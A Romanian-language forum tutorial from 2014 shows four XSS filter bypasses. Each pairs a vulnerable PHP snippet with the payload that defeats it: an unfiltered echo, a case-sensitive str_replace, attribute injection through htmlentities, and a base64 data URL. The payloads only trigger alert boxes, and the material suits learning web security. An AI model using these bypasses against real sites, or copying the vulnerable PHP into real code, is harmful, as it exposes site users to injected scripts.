Corex Posted March 25, 2014 Report Posted March 25, 2014 (edited) In acest tutorial va voi arata 4 tipuri de bypasuri XSS si cam cum arata scriptul in spate.Sa inepem !Fara Filtru.Varianta fara filtru nu prea iti da batai de cap deoarece se introduce direct vectorul <script>alert(/xss/)</script>Cum apare acest tip de xss? Pur si simplu afiseaza toate informatiile care sunt trecute prin GETcodu din spate arata cam asa<?php$functie =($_GET ['xss']);echo ("$functie ")?>Ca sa afisezi alerta XSS vei face asawww.white-hackers.com/xss1.php?xss=<script>alert(2)</script>Bypass basic folosinduse de filtrul str_replace()Aceasta functie cauta un sir specificat (in cazul nostru) <script> si il modifica (in cazul nostru NULL)Haide sa vedeti si cum arata codu sursa pentru acest tip de XSS<?phpecho 'Rezultat '.str_replace('script', null, $_GET['xss']);?>Ca sa treci de acest filtru trebuie sa folosim un bypass (este foarte usor)www.white-hackers.com/xss2.php?xss=<ScRiPt>alert(2)</ScRiPt>XSS Filtru htmlentities()htmlentities converteste toate functiile din HTML . Intr-un cuvant toate tagurile din HTML le traduce in HTML (nu afecteaza codul sursa)Scriptul din spate o sa arate cam asa<?phpecho "<img alt='' src='".htmlentities($_GET['xss'])."' />";?>Ca sa trecem de acest filtru trebuie sa continuam scriptul dar sa includem alertaacest lucru se va face cam asawww.white-hackers.com/xss3.php?xss=.' onerror='alert("XSS")Filtru folosinduse de data URLsAceasta metoda este putin mai ciudata deoarece practic vom folosi datele URL care in cele mai multe cazuri sunt folosite pentru imagini pentru a le pastra ca si text intr-un HTMLHaide sa vedem cum arata codul sursa<?phpecho '<object data="'.htmlspecialchars($_GET['xss']).'"></object>';?>Ca sa afisam alerta XSS trebuie sa ne folosim de data:text/html;base64iar dupa vom cripta in base64 vectorul <script>alert(2)</script>Deci va arata cam asawww.white-hackers.com/xss4.php?xss=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= Edited March 25, 2014 by Corex 1 Quote